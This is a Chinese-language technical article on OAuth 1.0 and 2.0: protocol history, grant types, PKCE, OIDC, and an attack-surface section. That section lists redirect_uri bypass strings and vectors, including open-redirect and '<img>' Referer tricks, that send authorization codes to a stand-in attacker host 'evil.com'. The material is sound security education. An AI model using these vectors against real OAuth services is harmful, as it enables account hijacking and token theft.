&lt;li&gt;&lt;a href=&quot;#22-%E5%8D%8F%E8%AE%AE%E6%B5%81%E7%A8%8B&quot;&gt;2.2. 协议流程&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#23-%E6%8E%88%E6%9D%83%E6%A8%A1%E5%BC%8F&quot;&gt;2.3. 授权模式&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#231-%E6%8E%88%E6%9D%83%E7%A0%81%E6%A8%A1%E5%BC%8Fauthorization-code&quot;&gt;2.3.1. 授权码模式(Authorization Code)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#232-%E6%8E%88%E6%9D%83%E7%A0%81pkce%E6%A8%A1%E5%BC%8Fauthorization-code-with-pkce&quot;&gt;2.3.2. 授权码+PKCE模式(Authorization Code with PKCE)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#233-%E5%AE%A2%E6%88%B7%E7%AB%AF%E5%87%AD%E8%AF%81%E6%A8%A1%E5%BC%8Fclient-credentials&quot;&gt;2.3.3. 客户端凭证模式(Client Credentials)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#234-%E7%94%A8%E6%88%B7%E5%87%AD%E8%AF%81%E6%A8%A1%E5%BC%8Fresource-owner-password-credentials-%E4%B8%8D%E5%AE%89%E5%85%A8&quot;&gt;2.3.4. 用户凭证模式(Resource Owner Password Credentials) 不安全&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#235-%E9%9A%90%E5%BC%8F%E6%8E%88%E6%9D%83%E6%A8%A1%E5%BC%8Fimplicit-%E4%B8%8D%E5%AE%89%E5%85%A8&quot;&gt;2.3.5. 隐式授权模式(Implicit) 不安全&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#236-%E8%AE%BE%E5%A4%87%E4%BB%A3%E7%A0%81%E6%A8%A1%E5%BC%8Fdevice-code-%E6%9E%81%E5%A4%A7%E6%A6%82%E7%8E%87%E5%AD%98%E5%9C%A8session-fixation-attack%E6%BC%8F%E6%B4%9E&quot;&gt;2.3.6. 设备代码模式(Device Code) 极大概率存在Session Fixation Attack漏洞&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#24-oidc&quot;&gt;2.4. OIDC&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3-oauth2%E6%94%BB%E5%87%BB%E9%9D%A2&quot;&gt;3. OAuth2攻击面&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#31-csrf%E5%AF%BC%E8%87%B4%E7%BB%91%E5%AE%9A%E5%8A%AB%E6%8C%81&quot;&gt;3.1. CSRF导致绑定劫持&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#32-redirect_uri%E7%BB%95%E8%BF%87%E5%AF%BC%E8%87%B4%E6%8E%88%E6%9D%83%E5%8A%AB%E6%8C%81&quot;&gt;3.2. redirect_uri绕过导致授权劫持&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#33-scope%E8%B6%8A%E6%9D%83%E8%AE%BF%E9%97%AE&quot;&gt;3.3. scope越权访问&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4-%E5%90%8D%E8%AF%8D%E8%A7%A3%E9%87%8A&quot;&gt;4. 名词解释&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#5-%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99&quot;&gt;5. 参考资料&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;1. 前言&lt;/h1&gt;
&lt;p&gt;随着大量开放平台的出现，建立在开放平台之上的各种第三方应用也在大量涌现，出于对安全性和统一标准的要求，诞生了oauth协议。&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc5849&quot;&gt;OAuth 1.0&lt;/a&gt;于2007年推出后迅速被广泛使用。&lt;/p&gt;
&lt;p&gt;但是在2009年，OAuth 1.0被曝出存在严重安全漏洞&lt;a href=&quot;https://oauth.net/advisories/2009-1/&quot;&gt;Session Fixation Attack&lt;/a&gt;，于同年发布修复后版本&lt;a href=&quot;https://oauth.net/core/1.0a/&quot;&gt;OAuth 1.0 Revision A&lt;/a&gt;。&lt;/p&gt;
&lt;p&gt;2010年发布&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc6749&quot;&gt;OAuth 2.0&lt;/a&gt;，是OAuth协议的下一版本，但与OAuth 1.0版本互不兼容。&lt;/p&gt;
&lt;p&gt;2013年发布&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc7636&quot;&gt;PKCE(Proof Key for Code Exchange by OAuth Public Clients)&lt;/a&gt;，是OAuth 2.0的一个扩展，用于增强公共客户端的安全性。&lt;/p&gt;
&lt;p&gt;2015年发布&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc8252&quot;&gt;OAuth 2.0 for Native Apps&lt;/a&gt;，是OAuth 2.0的一个扩展，用于增强移动应用的安全性，描述了使用OAuth 2.0的本机和移动应用程序的安全要求和其他建议。包括不允许第三方应用打开嵌入式web视图，以防止钓鱼攻击，以及如何在平台上执行的特定建议。同时还建议使用PKCE扩展进一步保护用户。&lt;/p&gt;
&lt;p&gt;2017年发布&lt;a href=&quot;https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics&quot;&gt;Security Best Current Practice&lt;/a&gt;，是OAuth 2.0的一个扩展，描述了安全要求和其他建议，用于实现OAuth 2.0的客户端和服务器。&lt;/p&gt;
&lt;p&gt;2019年发布&lt;a href=&quot;https://datatracker.ietf.org/doc/html/draft-ietf-oauth-browser-based-apps&quot;&gt;OAuth 2.0 for Browser-Based Apps&lt;/a&gt;，是OAuth 2.0的一个扩展，用于增强浏览器应用的安全性，针对SPA(Single Page Application)建议使用PKCE扩展替代隐式授权流(Implicit flow)。&lt;/p&gt;
&lt;p&gt;2021年发布&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc6749&quot;&gt;OAuth 2.1&lt;/a&gt;，OAuth 2.1总结了后续规范中发布的更改，以简化核心文档。主要区别如下:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;PKCE是所有使用授权码流的OAuth客户端的必需项&lt;/li&gt;
&lt;li&gt;重定向URI必须使用精确字符串匹配进行比较&lt;/li&gt;
&lt;li&gt;省略了隐式授权流（response_type = token）的定义&lt;/li&gt;
&lt;li&gt;省略了资源所有者密码凭证授予的定义&lt;/li&gt;
&lt;li&gt;Bearer令牌使用省略了在URI的查询字符串中使用bearer令牌的使用&lt;/li&gt;
&lt;li&gt;对于公共客户端，刷新令牌必须是发送者约束的或一次性使用&lt;/li&gt;
&lt;li&gt;公共和机密客户端的定义已简化为仅指示客户端是否具有凭据&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;1.1. OAuth 1.0漏洞(Session Fixation Attack)分析&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;./801e57d84801b8abf8cde2e8793bf185.png&quot; alt=&quot;801e57d84801b8abf8cde2e8793bf185.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;正常流程为：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;用户访问第三方应用&lt;/li&gt;
&lt;li&gt;用户请求从资源提供者导入资源&lt;/li&gt;
&lt;li&gt;用户携带oauth_token跳转到资源提供者的授权页面&lt;/li&gt;
&lt;li&gt;用户登录到资源提供者系统&lt;/li&gt;
&lt;li&gt;用户授权oauth_token访问资源权限&lt;/li&gt;
&lt;li&gt;用户携带oauth_token跳转到return_url指定的第三方应用&lt;/li&gt;
&lt;li&gt;第三方应用使用oauth_token请求资源&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;./79e8df9b51ab3f86d871bd6002f2dc2c.png&quot; alt=&quot;79e8df9b51ab3f86d871bd6002f2dc2c.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;攻击者可以利用的流程在3、4、5、6步骤&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;攻击者构造包含oauth_token和无效return_url的URL&lt;/li&gt;
&lt;li&gt;让受害者点击链接访问，登录授权后，跳转到无效return_url&lt;/li&gt;
&lt;li&gt;此时受害者授权流程已经中断，攻击者可以利用受害者的oauth_token访问第三方应用完成授权&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;漏洞成因可以总结为，授权码生成方式问题。OAuth1.0中，授权码在请求授权过程中可任意生成，导致授权码可能来自于攻击者。同时授权和令牌获取过程是割裂的，导致攻击者可以优先于受害者获取令牌。&lt;/p&gt;
&lt;h1&gt;2. 什么是OAuth2&lt;/h1&gt;
&lt;p&gt;OAuth 2.0是一个业界标准的授权协议，其定义了四种可以适用于各种应用场景的授权交互模式：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;授权码模式(Authorization Code)&lt;/li&gt;
&lt;li&gt;客户端凭证模式(Client Credentials)&lt;/li&gt;
&lt;li&gt;用户凭证模式(Resource Owner Password Credentials)&lt;/li&gt;
&lt;li&gt;隐式授权模式(Implicit)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;其中，授权码模式被广泛应用于第三方互联网开放平台，通过第三方登录是其最常见应用场景之一，比如使用微信、QQ和淘宝账号进行登录。&lt;/p&gt;
&lt;p&gt;有一些设备存在无浏览器或输入受限情况，所以在&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc8628&quot;&gt;rfc8628 - OAuth 2.0 Device Authorization Grant&lt;/a&gt;引入设备授权(Device code)模式。&lt;/p&gt;
&lt;p&gt;为了解决SPA、原生应用等授权安全性问题，基于授权码模式引入PKCE，形成授权码+PKCE模式(Authorization Code with PKCE)。&lt;/p&gt;
&lt;h2&gt;2.1. 角色&lt;/h2&gt;
&lt;p&gt;OAuth 2.0定义了四种角色：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;资源拥有者（Resource Owner）：资源拥有者是指可以授权第三方应用访问自己资源的用户，比如微信用户。&lt;/li&gt;
&lt;li&gt;资源服务器（Resource Server）：资源服务器是指存储资源的服务器，比如微信服务器。&lt;/li&gt;
&lt;li&gt;客户端（Client）：客户端是指第三方应用，比如京东小程序。&lt;/li&gt;
&lt;li&gt;授权服务器（Authorization Server）：授权服务器是指用于进行授权的服务器，比如微信开放平台。&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;2.2. 协议流程&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;+--------+                               +---------------+
|        |--(A)- Authorization Request -&amp;gt;|   Resource    |
|        |                               |     Owner     |
|        |&amp;lt;-(B)-- Authorization Grant ---|               |
|        |                               +---------------+
|        |
|        |                               +---------------+
|        |--(C)-- Authorization Grant --&amp;gt;| Authorization |
| Client |                               |     Server    |
|        |&amp;lt;-(D)----- Access Token -------|               |
|        |                               +---------------+
|        |
|        |                               +---------------+
|        |--(E)----- Access Token ------&amp;gt;|    Resource   |
|        |                               |     Server    |
|        |&amp;lt;-(F)--- Protected Resource ---|               |
+--------+                               +---------------+
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;A. 客户端向资源拥有者发起授权请求，请求授权服务器授予客户端访问资源服务器的权限。&lt;/li&gt;
&lt;li&gt;B. 资源拥有者授权客户端访问资源服务器的权限，授权服务器返回授权码给客户端。&lt;/li&gt;
&lt;li&gt;C. 客户端向授权服务器请求访问令牌。&lt;/li&gt;
&lt;li&gt;D. 授权服务器验证授权码，返回访问令牌给客户端。&lt;/li&gt;
&lt;li&gt;E. 客户端向资源服务器请求资源。&lt;/li&gt;
&lt;li&gt;F. 资源服务器验证访问令牌，返回资源给客户端。&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;2.3. 授权模式&lt;/h2&gt;
&lt;p&gt;仅ABCD流程不同，区分为不同模式。&lt;/p&gt;
&lt;h3&gt;2.3.1. 授权码模式(Authorization Code)&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;./997ae2800f9c9f31ee64b386c160e018.png&quot; alt=&quot;997ae2800f9c9f31ee64b386c160e018.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;这种模式广泛用于第三方应用授权登录，比如使用微信、QQ账号进行登录。&lt;/p&gt;
&lt;h3&gt;2.3.2. 授权码+PKCE模式(Authorization Code with PKCE)&lt;/h3&gt;
&lt;p&gt;在&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc7636&quot;&gt;rfc7636 - Proof Key for Code Exchange by OAuth Public Clients&lt;/a&gt;定义了PKCE，用于解决授权码模式存在的安全性问题。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./3a1c8a2c4c9483dd97d676d46f7c373a.png&quot; alt=&quot;3a1c8a2c4c9483dd97d676d46f7c373a.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;这种模式广泛用于客户端应用授权登录，比如electron应用、移动应用等。&lt;/p&gt;
&lt;p&gt;其中：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;code_verifier：在 &lt;code&gt;[A-Z] / [a-z] / [0-9] / &quot;-&quot; / &quot;.&quot; / &quot;_&quot; / &quot;~&quot;&lt;/code&gt; 范围内，生成43-128位的随机字符串。&lt;/li&gt;
&lt;li&gt;code_challenge：则是对 code_verifier 通过 code_challenge_method 例如 sha256 转换得来的。&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;Q: PKCE到底防御哪种攻击？ A: 在SPA、原生应用（如移动应用）、桌面应用（如electron）中，授权过程中有可能会打开外部浏览器，而浏览器可能会被其他应用劫持，导致授权过程被篡改。PKCE是为了防御这种攻击。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;2.3.3. 客户端凭证模式(Client Credentials)&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;./0ea51598b4ff50260fb5617c783417a8.png&quot; alt=&quot;0ea51598b4ff50260fb5617c783417a8.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;这种模式用于客户端应用存储凭证，自行授权访问资源服务器，比如后端服务使用AK/SK请求操作OSS资源。&lt;/p&gt;
&lt;h3&gt;2.3.4. 用户凭证模式(Resource Owner Password Credentials) 不安全&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;./9c140672e8cc8683a074d16fdae83826.png&quot; alt=&quot;9c140672e8cc8683a074d16fdae83826.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;由于凭证会发送给第三方使用，所以这种模式不安全，不推荐使用。&lt;/p&gt;
&lt;h3&gt;2.3.5. 隐式授权模式(Implicit) 不安全&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;./25d2de245c3a6040111a64eb1d91f7f8.png&quot; alt=&quot;25d2de245c3a6040111a64eb1d91f7f8.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;一般用于无后端应用，前端存储凭证。&lt;/p&gt;
&lt;p&gt;由于是跳转到三方应用使用GET请求，且服务器直接回传的是授权凭证，在终端容易被读取，如通过资源文件referer，所以这种模式不安全，不推荐使用。&lt;/p&gt;
&lt;p&gt;在某篇博客中曾看到，腾讯存在某个服务使用了隐式授权模式，但是回传Access Token的时候，使用锚点（#），这样锚点之后的数据就不会发送给服务器。但是这种方式也存在安全问题，因为锚点之后的数据是可以被前端获取的，所以这种方式也不安全。&lt;/p&gt;
&lt;h3&gt;2.3.6. 设备代码模式(Device Code) 极大概率存在Session Fixation Attack漏洞&lt;/h3&gt;
&lt;p&gt;在&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc8628&quot;&gt;rfc8628 - OAuth 2.0 Device Authorization Grant&lt;/a&gt;定义了一种新的授权模式，用于设备在无浏览器或输入受限情况下的授权。&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;+----------+                                +----------------+
|          |&amp;gt;---(A)-- Client Identifier ---&amp;gt;|                |
|          |                                |                |
|          |&amp;lt;---(B)-- Device Code,      ---&amp;lt;|                |
|          |          User Code,            |                |
|  Device  |          &amp;amp; Verification URI    |                |
|  Client  |                                |                |
|          |  [polling]                     |                |
|          |&amp;gt;---(E)-- Device Code       ---&amp;gt;|                |
|          |          &amp;amp; Client Identifier   |                |
|          |                                |  Authorization |
|          |&amp;lt;---(F)-- Access Token      ---&amp;lt;|     Server     |
+----------+   (&amp;amp; Optional Refresh Token)   |                |
      v                                     |                |
      :                                     |                |
      (C) User Code &amp;amp; Verification URI      |                |
      :                                     |                |
      v                                     |                |
+----------+                                |                |
| End User |                                |                |
|    at    |&amp;lt;---(D)-- End user reviews  ---&amp;gt;|                |
|  Browser |          authorization request |                |
+----------+                                +----------------+
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;./e8de63708d5258e6d0d07dc059185078.png&quot; alt=&quot;e8de63708d5258e6d0d07dc059185078.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;当Device Client为公共客户端，将退化为OAuth1.0认证方式。&lt;/p&gt;
&lt;h2&gt;2.4. OIDC&lt;/h2&gt;
&lt;p&gt;OpenID Connect 1.0 是 OAuth 2.0 协议的一个简单身份层。它允许客户端基于授权服务器执行的身份验证来验证最终用户的身份，以及以可互操作且类似 REST 的方式获取有关最终用户的基本配置文件信息。&lt;/p&gt;
&lt;p&gt;简单来说：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;授权码模式：使用response_type=code，用授权码换取令牌AccessToken。&lt;/li&gt;
&lt;li&gt;OIDC：使用scope=openid&amp;amp;response_type=code，用授权码换取用于验证身份的JWT。&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;3. OAuth2攻击面&lt;/h1&gt;
&lt;h2&gt;3.1. CSRF导致绑定劫持&lt;/h2&gt;
&lt;p&gt;攻击者抓取认证请求构造恶意url，并诱骗已经登录的网用户点击(比如通过邮件或者QQ等方式)，认证成功后用户的帐号会同攻击者的帐号绑定到一起。&lt;/p&gt;
&lt;p&gt;OAuth 2.0提供了state参数用于防御CSRF，认证服务器在接收到的state参数按原样返回给redirect_uri，客户端收到该参数并验证与之前生成的值是否一致，除此方法外也可使用传统的CSRF防御方案。&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;案例1: &lt;a href=&quot;http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2014-054785&quot;&gt;人人网-百度OAuth 2.0 redirect_uir CSRF 漏洞&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;3.2. redirect_uri绕过导致授权劫持&lt;/h2&gt;
&lt;p&gt;根据OAuth的认证流程，用户授权凭证会由服务器转发到redirect_uri对应的地址。&lt;/p&gt;
&lt;p&gt;如果攻击者伪造redirect_uri为自己的地址，然后诱导用户发送该请求，之后获取的凭证就会发送给攻击者伪造的回调地址，攻击者使用该凭证即可登录用户账号，造成授权劫持。&lt;/p&gt;
&lt;p&gt;正常情况下，为了防止该情况出现，认证服务器会验证自己的client_id与回调地址是否对应，常见的方法是验证回调地址的主域。&lt;/p&gt;
&lt;p&gt;以下几种情况验证配置不当，容易导致授权劫持：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;未验证&lt;/p&gt;
&lt;p&gt;未验证的情况，可以直接跳出外域。案例:&lt;a href=&quot;http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2013-045318&quot;&gt;土豆网某处认证缺陷可劫持oauth_token&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;验证绕过&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;auth.app.com.evil.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;evil.com?auth.app.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;evil.com?@auth.app.com&lt;/code&gt; 案例:&lt;a href=&quot;http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2014-059427&quot;&gt;腾讯OAuth平台 redirect_uri 过滤不严可能导致用户信息遭窃取（二）&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;auth.app.com@evil.com&lt;/code&gt; 案例:&lt;a href=&quot;http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2013-045327&quot;&gt;绕过网易oauth认证的redirect_uri限制劫持帐号token&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;auth.app.com@evil.com&lt;/code&gt; 案例:&lt;a href=&quot;http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2014-059676&quot;&gt;腾讯OAuth平台redirect_uri过滤不严可能导致用户信息遭窃取（四）&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;evil.comauth.app.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;evil.com:auth.app.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;evil.com.auth.app.com&lt;/code&gt; 案例:&lt;a href=&quot;http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2014-059403&quot;&gt;腾讯OAuth平台redirect_uri过滤不严可能导致用户信息遭窃取&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;evil.com:@auth.app.com&lt;/code&gt; 案例:&lt;a href=&quot;http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2014-059455&quot;&gt;新浪微博OAuth平台redirect_uri过滤不严可能导致用户信息遭窃取&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;宽字符绕过 案例: &lt;a href=&quot;http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2014-059639&quot;&gt;腾讯OAuth平台redirect_uri过滤不严可能导致用户信息遭窃取（三）&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;子域可控&lt;/p&gt;
&lt;p&gt;对回调地址验证了主域为app.com，但其子域evil.app.com可被任意用户注册使用。案例:&lt;a href=&quot;http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2014-060586&quot;&gt;新浪微博部分App Oauth2漏洞&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;跨域&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;利用可信域跳转盗取授权码。
&lt;ol&gt;
&lt;li&gt;如果网站存在任意跳转，如&lt;code&gt;https://www.example.com/?return_url=&lt;/code&gt;，且未校验跳转后地址。可以构造如下向量&lt;code&gt;https://www.example.com/?return_url=https://www.evil.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;诱骗用户访问该链接&lt;code&gt;https://www.example.com/oauth/authorize?client_id=xxx&amp;amp;redirect_uri=https://www.example.com/?return_url=https://www.evil.com&amp;amp;response_type=code&amp;amp;state=xxx&lt;/code&gt;触发OAuth认证&lt;/li&gt;
&lt;li&gt;用户授权之后，会继续跳转到&lt;code&gt;https://www.evil.com&lt;/code&gt;，攻击者可以从&lt;code&gt;referer&lt;/code&gt;头获取到授权码。&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;利用可信域referer盗取授权码。
&lt;ol&gt;
&lt;li&gt;如果跳转后页面可控，比如可以插入自定义图片，或者存在xss漏洞，可以构造向量&lt;code&gt;&amp;lt;img src=&quot;https://www.evil.com&quot;&amp;gt;&lt;/code&gt;，用户授权之后，会向&lt;code&gt;https://www.evil.com&lt;/code&gt;请求资源文件，攻击者可以从&lt;code&gt;referer&lt;/code&gt;头获取到授权码。&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;3.3. scope越权访问&lt;/h2&gt;
&lt;p&gt;案例:&lt;a href=&quot;https://coolshell.cn/articles/11021.html&quot;&gt;从“黑掉GITHUB”学WEB安全开发&lt;/a&gt;展示了scope权限控制不当带来的安全风险，同时将授权劫持的几个方面演绎的淋漓尽致。&lt;/p&gt;
&lt;h1&gt;4. 名词解释&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;CAS: Central Authentication Service, 中心认证服务&lt;/li&gt;
&lt;li&gt;AS: Authorization Server, 授权服务器&lt;/li&gt;
&lt;li&gt;RS: Resource Server, 资源服务器&lt;/li&gt;
&lt;li&gt;SPA: Single Page Application, 单页应用&lt;/li&gt;
&lt;li&gt;SSO: Single Sign On, 单点登录&lt;/li&gt;
&lt;li&gt;OIDC: OpenID Connect, 开放身份连接&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;5. 参考资料&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc5849&quot;&gt;rfc5849 - The OAuth 1.0 Protocol&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc6749&quot;&gt;rfc6749 - The OAuth 2.0 Authorization Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc6750&quot;&gt;rfc6750 - The OAuth 2.0 Authorization Framework: Bearer Token Usage&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc6819&quot;&gt;rfc6819 - OAuth 2.0 Threat Model and Security Considerations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc7009&quot;&gt;rfc7009 - OAuth 2.0 Token Revocation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc7521&quot;&gt;rfc7521 - Assertion Framework for OAuth 2.0 Client Authentication and Authorization Grants&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc7522&quot;&gt;rfc7522 - Security Assertion Markup Language (SAML) 2.0 Profile for OAuth 2.0 Client Authentication and Authorization Grants&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc7523&quot;&gt;rfc7523 - JSON Web Token (JWT) Profile for OAuth 2.0 Client Authentication and Authorization Grants&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc7591&quot;&gt;rfc7591 - OAuth 2.0 Dynamic Client Registration Protocol&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc7592&quot;&gt;rfc7592 - OAuth 2.0 Dynamic Client Registration Management Protocol&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc7636&quot;&gt;rfc7636 - Proof Key for Code Exchange by OAuth Public Clients&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc7662&quot;&gt;rfc7662 - OAuth 2.0 Token Introspection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc8252&quot;&gt;rfc8252 - OAuth 2.0 for Native Apps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc8414&quot;&gt;rfc8414 - OAuth 2.0 Authorization Server Metadata&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc8628&quot;&gt;rfc8628 - OAuth 2.0 Device Authorization Grant&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc8693&quot;&gt;rfc8693 - OAuth 2.0 Token Exchange&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.rfc-editor.org/rfc/rfc8705&quot;&gt;rfc8705 - OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics&quot;&gt;Security Best Current Practice&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://datatracker.ietf.org/doc/html/draft-ietf-oauth-browser-based-apps&quot;&gt;OAuth 2.0 for Browser-Based Apps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://oauth.net/2/&quot;&gt;oauth.net&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://zhuanlan.zhihu.com/p/92051359&quot;&gt;白话让你理解什么是oAuth2协议&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cnblogs.com/h2zZhou/p/5741262.html&quot;&gt;OAuth 2.0攻击面与案例总结&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.authing.cn/blog/558&quot;&gt;OIDC &amp;amp; OAuth2.0 协议及其授权模式详解&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.ruanyifeng.com/blog/2019/04/oauth_design.html&quot;&gt;OAuth 2.0 的一个简单解释&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://openid.net/connect/&quot;&gt;OpenID Connect&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
